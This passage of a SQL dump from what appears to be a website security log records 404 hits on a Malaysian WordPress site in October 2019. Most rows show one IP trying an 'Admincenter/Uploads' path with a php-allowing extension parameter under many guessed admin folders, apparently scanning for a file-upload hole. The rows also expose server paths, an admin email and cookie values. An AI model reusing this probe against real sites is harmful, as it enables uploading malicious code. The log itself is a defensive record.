CRIPT_URL\";s:76:\"/aaa/Admincenter/Uploads.upload.allowpath.1.allowext.gif|php|jpeg|png|bmp.do\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XaeaLOAdYZLFiOaMP2nUoQAAAAo\";s:11:\"nokeepalive\";s:1:\"1\";s:20:\"ssl_unclean_shutdown\";s:1:\"1\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571265069.1569\";s:12:\"REQUEST_TIME\";s:10:\"1571265069\";}}','notice','2019-10-16 22:31:11','2019-10-16 22:31:09',35050360,36863808,'https://bintara.com.my/aaa/Admincenter/Uploads.upload.allowpath.1.allowext.gif%7Cphp%7Cjpeg%7Cpng%7Cbmp.do?dir=image',1,0,'49.70.55.43'),(28173,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:49:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:97:\"/admsys/Admincenter/Uploads.upload.allowpath.1.allowext.gif%7Cphp%7Cjpeg%7Cpng%7Cbmp.do?dir=image\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:37:\"text/html, application/xhtml+xml, */*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-CN\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=59725a712bcf46391d4cc73ba05b9211\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:11:\"HTTP_PRAGMA\";s:8:\"no-cache\";s:12:\"HTTP_REFERER\";s:119:\"http://bintara.com.my//admsys/Admincenter/Uploads.upload.allowpath.1.allowext.gif%7Cphp%7Cjpeg%7Cpng%7Cbmp.do?dir=image\";s:15:\"HTTP_USER_AGENT\";s:70:\"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:9:\"dir=image\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:21:\"REDIRECT_QUERY_STRING\";s:9:\"dir=image\";s:19:\"REDIRECT_SCRIPT_URI\";s:101:\"https://bintara.com.my/admsys/Admincenter/Uploads.upload.allowpath.1.allowext.gif|php|jpeg|png|bmp.do\";s:19:\"REDIRECT_SCRIPT_URL\";s:79:\"/admsys/Admincenter/Uploads.upload.allowpath.1.allowext.gif|php|jpeg|png|bmp.do\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XaeaPG2CjfSaL8DJw2BwLgAAAFU\";s:12:\"REDIRECT_URL\";s:79:\"/admsys/Admincenter/Uploads.upload.allowpath.1.allowext.gif|php|jpeg|png|bmp.do\";s:20:\"REDIRECT_nokeepalive\";s:1:\"1\";s:29:\"REDIRECT_ssl_unclean_shutdown\";s:1:\"1\";s:11:\"REMOTE_ADDR\";s:11:\"49.70.55.43\";s:11:\"REMOTE_PORT\";s:5:\"56582\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:101:\"https://bintara.com.my/admsys/Admincenter/Uploads.upload.allowpath.1.allowext.gif|php|jpeg|png|bmp.do\";s:10:\"SCRIPT_URL\";s:79:\"/admsys/Admincenter/Uploads.upload.allowpath.1.allowext.gif|php|jpeg|png|bmp.do\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XaeaPG2CjfSaL8DJw2BwLgAAAFU\";s:11:\"nokeepalive\";s:1:\"1\";s:20:\"ssl_unclean_shutdown\";s:1:\"1\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1571265084.469\";s:12:\"REQUEST_TIME\";s:10:\"1571265084\";}}','notice','2019-10-16 22:31:28','2019-10-16 22:31:25',35051120,36866456,'https://bintara.com.my/admsys/Admincenter/Uploads.upload.allowpath.1.allowext.gif%7Cphp%7Cjpeg%7Cpng%7Cbmp.do?dir=image',1,0,'49.70.55.43'),(28174,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:49:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:92:\"/a/Admincenter/Uploads.upload.allowpath.1.allowext.gif%7Cphp%7Cjpeg%7Cpng%7Cbmp.do?dir=image\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:37:\"text/html, application/xhtml+xml, */*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-CN\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=9747da67fafdeb382f9d08219ba2a58a\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:11:\"HTTP_PRAGMA\";s:8:\"no-cache\";s:12:\"HTTP_REFERER\";s:114:\"http://bintara.com.my//a/Admincenter/Uploads.upload.allowpath.1.allowext.gif%7Cphp%7Cjpeg%7Cpng%7Cbmp.do?dir=image\";s:15:\"HTTP_USER_AGENT\";s:70:\"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:9:\"dir=image\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:21:\"REDIRECT_QUERY_STRING\";s:9:\"dir=image\";s:19:\"REDIRECT_SCRIPT_URI\";s:96:\"https://bintara.com.my/a/Admincenter/Uploads.upload.allowpath.1.allowext.gif|php|jpeg|png|bmp.do\";s:19:\"REDIRECT_SCRIPT_URL\";s:74:\"/a/Admincenter/Uploads.upload.allowpath.1.allowext.gif|php|jpeg|png|bmp.do\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XaeaUW2CjfSaL8DJw2BwSgAAAE0\";s:12:\"REDIRECT_URL\";s:74:\"/a/Admincenter/Uploads.upload.allowpath.1.allowext.gif|php|jpeg|png|bmp.do\";s:20:\"REDIRECT_nokeepalive\";s:1:\"1\";s:29:\"REDIRECT_ssl_unclean_shutdown\";s:1:\"1\";s:11:\"REMOTE_ADDR\";s:11:\"49.70.55.43\";s:11:\"REMOTE_PORT\";s:5:\"57780\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:96:\"https://bintara.com.my/a/Admincenter/Uploads.upload.allowpath.1.allowext.gif|php|jpeg|png|bmp.do\";s:10:\"SCRIPT_URL\";s:74:\"/a/Admincenter/Uploads.upload.allowpath.1.allowext.gif|php|jpeg|png|bmp.do\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XaeaUW2CjfSaL8DJw2BwSgAAAE0\";s:11:\"nokeepalive\";s:1:\"1\";s:20:\"ssl_unclean_shutdown\";s:1:\"1\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571265105.7644\";s:12:\"REQUEST_TIME\";s:10:\"1571265105\";}}','notice','2019-10-16 22:31:47','2019-10-16 22:31:46',35050728,36852016,'https://bintara.com.my/a/Admincenter/Uploads.upload.allowpath.1.allowext.gif%7Cphp%7Cjpeg%7Cpng%7Cbmp.do?dir=image',1,0,'49.70.55.43'),(28175,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:49:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:94:\"/www/Admincenter/Uploads.upload.allowpath.1.allowext.gif%7Cphp%7Cjpeg%7Cpng%7Cbmp.do?dir=image\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:37:\"text/html, application/xhtml+xml, */*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-CN\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=027673083742acdfadb24e6226477966\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:11:\"HTTP_PRAGMA\";s:8:\"no-cache\";s:12:\"HTTP_REFERER\";s:116:\"http://bintara.com.my//www/Admincenter/Uploads.upload.allowpath.1.allowext.gif%7Cphp%7Cjpeg%7Cpng%7Cbmp.do?dir=image\";s:15:\"HTTP_USER_AGENT\";s:70:\"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:9:\"dir=image\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:21:\"REDIRECT_QUERY_STRING\";s:9:\"dir=image\";s:19:\"REDIRECT_SCRIPT_URI\";s:98:\"https://bintara.com.my/www/Admincenter/Uploads.upload.allowpath.1.allowext.gif|php|jpeg|png|bmp.do\";s:19:\"REDIRECT_SCRIPT_URL\";s:76:\"/www/Admincenter/Uploads.upload.allowpath.1.allowext.gif|php|jpeg|png|bmp.do\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XaeaWW2CjfSaL8DJw2BwVQAAAFI\";s:12:\"REDIRECT_URL\";s:76:\"/www/Admincenter/Uploads.upload.allowpath.1.allowext.gif|php|jpeg|png|bmp.do\";s:20:\"REDIRECT_nokeepalive\";s:1:\"1\";s:29:\"REDIRECT_ssl_unclean_shutdown\";s:1:\"1\";s:11:\"REMOTE_ADDR\";s:11:\"49.70.55.43\";s:11:\"REMOTE_PORT\";s:5:\"58370\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:98:\"https://bintara.com.my/www/Admincenter/Uploads.upload.allowpath.1.allowext.gif|php|jpeg|png|bmp.do\";s:10:\"SCRIPT_URL\";s:76:\"/www/Admincenter/Uploads.upload.allowpath.1.allowext.gif|php|jpeg|png|bmp.do\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XaeaWW2CjfSaL8DJw2BwVQAAAFI\";s:11:\"nokeepalive\";s:1:\"1\";s:20:\"ssl_unclean_shutdown\";s:1:\"1\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571265113.9438\";s:12:\"REQUEST_TIME\";s:10:\"1571265113\";}}','notice','2019-10-16 22:31:55','2019-10-16 22:31:54',35052056,36860592,'https://bintara.com.my/www/Admincenter/Uploads.upload.allowpath.1.allowext.gif%7Cphp%7Cjpeg%7Cpng%7Cbmp.do?dir=image',1,0,'49.70.55.43'),(28176,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:49:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:98:\"/sss@333/Admincenter/Uploads.upload.allowpath.1.allowext.gif%7Cphp%7Cjpeg%7Cpng%7Cbmp.do?dir=image\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:37:\"text/html, application/xhtml+xml, */*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-CN\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=efe45ac44a814509144e17367bbf8608\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:11:\"HTTP_PRAGMA\";s:8:\"no-cache\";s:12:\"HTTP_REFERER\";s:120:\"http://bintara.com.my//sss@333/Admincenter/Uploads.upload.allowpath.1.allowext.gif%7Cphp%7Cjpeg%7Cpng%7Cbmp.do?dir=image\";s:15:\"HTTP_USER_AGENT\";s:70:\"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:9:\"dir=image\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:21:\"REDIRECT_QUERY_STRING\";s:9:\"dir=image\";s:19:\"REDIRECT_SCRIPT_URI\";s:102:\"https://bintara.com.my/sss@333/Admincenter/Uploads.upload.allowpath.1.allowext.gif|php|jpeg|png|bmp.do\";s:19:\"REDIRECT_SCRIPT_URL\";s:80:\"/sss@333/Admincenter/Uploads.upload.allowpath.1.allowext.gif|php|jpeg|png|bmp.do\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XaeaYW2CjfSaL8DJw2BwWgAAAEU\";s:12:\"REDIRECT_URL\";s:80:\"/sss@333/Admincenter/Uploads.upload.allowpath.1.allowext.gif|php|jpeg|png|bmp.do\";s:20:\"REDIRECT_nokeepalive\";s:1:\"1\";s:29:\"REDIRECT_ssl_unclean_shutdown\";s:1:\"1\";s:11:\"REMOTE_ADDR\";s:11:\"49.70.55.43\";s:11:\"REMOTE_PORT\";s:5:\"58774\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:102:\"https://bintara.com.my/sss@333/Admincenter/Uploads.upload.allowpath.1.allowext.gif|php|jpeg|png|bmp.do\";s:10:\"SCRIPT_URL\";s:80:\"/sss@333/Admincenter/Uploads.upload.allowpath.1.allowext.gif|php|jpeg|png|bmp.do\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XaeaYW2CjfSaL8DJw2BwWgAAAEU\";s:11:\"nokeepalive\";s:1:\"1\";s:20:\"ssl_unclean_shutdown\";s:1:\"1\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571265121.5039\";s:12:\"REQUEST_TIME\";s:10:\"1571265121\";}}','notice','2019-10-16 22:32:04','2019-10-16 22:32:02',35047672,36852408,'https://bintara.com.my/sss@333/Admincenter/Uploads.upload.allowpath.1.allowext.gif%7Cphp%7Cjpeg%7Cpng%7Cbmp.do?dir=image',1,0,'49.70.55.43'),(28177,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:49:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:100:\"/admin_118/Admincenter/Uploads.upload.allowpath.1.allowext.gif%7Cphp%7Cjpeg%7Cpng%7Cbmp.do?dir=image\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:37:\"text/html, application/xhtml+xml, */*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-CN\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=56074bc65a3ff4528c880516168828a2\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:11:\"HTTP_PRAGMA\";s:8:\"no-cache\";s:12:\"HTTP_REFERER\";s:122:\"http://bintara.com.my//admin_118/Admincenter/Uploads.upload.allowpath.1.allowext.gif%7Cphp%7Cjpeg%7Cpng%7Cbmp.do?dir=image\";s:15:\"HTTP_USER_AGENT\";s:70:\"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:9:\"dir=image\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:21:\"REDIRECT_QUERY_STRING\";s:9:\"dir=image\";s:19:\"REDIRECT_SCRIPT_URI\";s:104:\"https://bintara.com.my/admin_118/Admincenter/Uploads.upload.allowpath.1.allowext.gif|php|jpeg|png|bmp.do\";s:19:\"REDIRECT_SCRIPT_URL\";s:82:\"/admin_118/Admincenter/Uploads.upload.allowpath.1.allowext.gif|php|jpeg|png|bmp.do\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XaeaarlwIHsXUl8AjRFKjgAAAMo\";s:12:\"REDIRECT_URL\";s:82:\"/admin_118/Admincenter/Uploads.upload.allowpath.1.allowext.gif|php|jpeg|png|bmp.do\";s:20:\"REDIRECT_nokeepalive\";s:1:\"1\";s:29:\"REDIRECT_ssl_unclean_shutdown\";s:1:\"1\";s:11:\"REMOTE_ADDR\";s:11:\"49.70.55.43\";s:11:\"REMOTE_PORT\";s:5:\"59311\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:104:\"https://bintara.com.my/admin_118/Admincenter/Uploads.upload.allowpath.1.allowext.gif|php|jpeg|png|bmp.do\";s:10:\"SCRIPT_URL\";s:82:\"/admin_118/Admincenter/Uploads.upload.allowpath.1.allowext.gif|php|jpeg|png|bmp.do\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XaeaarlwIHsXUl8AjRFKjgAAAMo\";s:11:\"nokeepalive\";s:1:\"1\";s:20:\"ssl_unclean_shutdown\";s:1:\"1\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571265130.7326\";s:12:\"REQUEST_TIME\";s:10:\"1571265130\";}}','notice','2019-10-16 22:32:12','2019-10-16 22:32:11',35050288,36866016,'https://bintara.com.my/admin_118/Admincenter/Uploads.upload.allowpath.1.allowext.gif%7Cphp%7Cjpeg%7Cpng%7Cbmp.do?dir=image',1,0,'49.70.55.43'),(28178,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=8eed3d43c6cb2028b885d87a45bc7dfa\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_KEEP_ALIVE\";s:2:\"15\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"136.243.199.108\";s:11:\"REMOTE_PORT\";s:5:\"60223\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"Xaeio9xKK3Ys46u9IjK2bAAAAMw\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571267235.7037\";s:12:\"REQUEST_TIME\";s:10:\"1571267235\";}}','notice','2019-10-16 23:07:19','2019-10-16 23:07:16',35036320,36835392,'https://bintara.com.my/?page_id=18',1,0,'136.243.199.108'),(28179,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=11\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:110:\"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/08C09F\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=11\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"104.160.14.19\";s:11:\"REMOTE_PORT\";s:5:\"58408\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XaekQYHxTfgsSIq42axfIAAAARc\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571267649.2959\";s:12:\"REQUEST_TIME\";s:10:\"1571267649\";}}','notice','2019-10-16 23:14:12','2019-10-16 